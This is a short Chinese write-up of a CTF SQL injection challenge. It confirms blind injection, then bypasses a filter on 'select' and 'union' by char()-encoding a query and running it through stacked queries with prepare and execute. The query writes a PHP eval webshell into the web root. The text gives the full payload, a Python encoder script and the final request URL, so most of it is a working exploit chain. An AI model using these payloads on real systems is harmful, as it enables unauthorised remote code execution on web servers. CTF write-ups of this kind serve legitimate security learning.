首先这道题需要预处理写马 之前在ctfshow中学习过预处理

我们来看看

CTFSHOW -SQL 注入-CSDN博客

首先我们开始判断是否存在注入

2^(if(1=0,1,0))2^(if(ascii(mid(user(),1,1))>0,0,1))判断出存在sql注入

然后我们开始fuzz  发现 select ，union 都没了

但是我们如果 ; 发现可以闭合 所以这里是存在堆叠注入的

但是是没有回显的

1;show databases;

所以我们看看能不能写木马

select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php这个是我们的木马

然后我们进行预处理

但是这里select 被过滤了所以我们使用char 拼接绕过str = "select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str = len(str)
for i in range(0,len_str):if i==0:print('char(%s' %ord(str[i]),end='')else:print(',%s' %ord(str[i]),end='')
print(')')

char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)

然后直接执行

?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare abcd from @sql;execute abcd;

这里就实现了绕过 并且执行了命令

/favicon/shell.php

即可实现